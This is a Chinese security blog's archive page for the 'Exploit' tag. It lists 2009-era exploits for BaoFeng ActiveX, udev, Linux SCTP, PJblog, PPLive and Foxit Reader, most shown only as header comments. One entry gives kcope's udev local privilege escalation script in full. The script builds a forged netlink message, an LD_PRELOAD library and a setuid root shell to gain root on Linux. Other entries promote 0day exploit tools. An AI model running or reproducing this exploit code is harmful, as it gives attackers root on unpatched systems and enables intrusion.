标签 ‘Exploit’ 下的日志

BaoFeng ActiveX OnBeforeVideoDownload() Remote BOF Exploit

#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL : mps.dll
# Problem Func : OnBeforeVideoDownload()
阅读全文 »

Tags: , ,

Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit

/*
* cve-2009-1185.c
*
* udev < 141 Local Privilege Escalation Exploit
* Jon Oberheide <[email protected]>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
* udev before 1.4.1 does not verify whether a NETLINK message originates
* from kernel space, which allows local users to gain privileges by sending
* a NETLINK message from user space.
阅读全文 »

Tags: , , , , ,

Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit

/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption
* Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
*
* coded by: sgrakkyu <at> antifork.org
* http://kernelbof.blogspot.com
*
*
* NOTE: you need at least one sctp application bound on the target box
*
* Supported target:
* Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
* Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
* Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
* Fedora Core 10 x86_64 (default installed kernel)
* OpenSuse 11.1 x86_64 (default installed kernel)
*/
阅读全文 »

Tags: , , ,

Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit

# 鬼仔注:相关日志 Linux爆本地提权漏洞 请立即更新udev程序udev,linux有史以来最危险的本地安全漏洞

# milw0rm.com [2009-04-20]

#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];

        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");

        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;

        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;

        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

        char message[LONG_STRING];
        char *mp;

        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);

        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);

        sendmsg(socket_fd, &msg, 0);

        close(socket_fd);

	sleep(10);
	execl("/tmp/suid", "suid", (void*)0);
}

_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 setgid(0);
 setuid(0);
 unsetenv("LD_PRELOAD");
 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
Tags: , , , , ,

PJblog V3.0 0day Vbs版漏洞利用工具

来源:WEB安全手册

感谢雨中风铃的投递

漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:
阅读全文 »

Tags: , , ,

PJblog V3.0 0day+EXP

作者:bink

影响版本:3.0
信息来源:零客网安www.0kee.com
Author:bink
漏洞文件:action.asp
阅读全文 »

Tags: , ,

PPLive < = 1.9.21 (/LoadModule) URI Handlers Argument Injection Vuln

——————————————————————————–
PPLive <= 1.9.21 uri handlers “/LoadModule” remote argument injection
by Nine:Situations:Group::strawdog
——————————————————————————–
software site:http://www.pplive.com/en/index.html
our site: http://retrogod.altervista.org/

software description:
“PPLive is a peer-to-peer streaming video network created in Huazhong University of Science and Technology, People’s Republic of China. It is part of a new generation of P2P applications, that combine P2P and Internet TV, called P2PTV.”
阅读全文 »

Tags: , ,

Foxit Reader 3.0 (< = Build 1301) PDF Buffer Overflow Exploit

#!/usr/bin/perl
#
# Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit
# ------------------------------------------------------------
# Exploit by SkD                          ([email protected])
#
# A SEH overflow occurs in this vulnerability in the popular
# Foxit Reader. The latest build (1506) is not affected but
# previous are. SafeSEH is a bitch in this one, but nothing
# is impossible :).
#
# Exploit written for Windows XP SP3.
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.
 阅读全文 »
Tags: , ,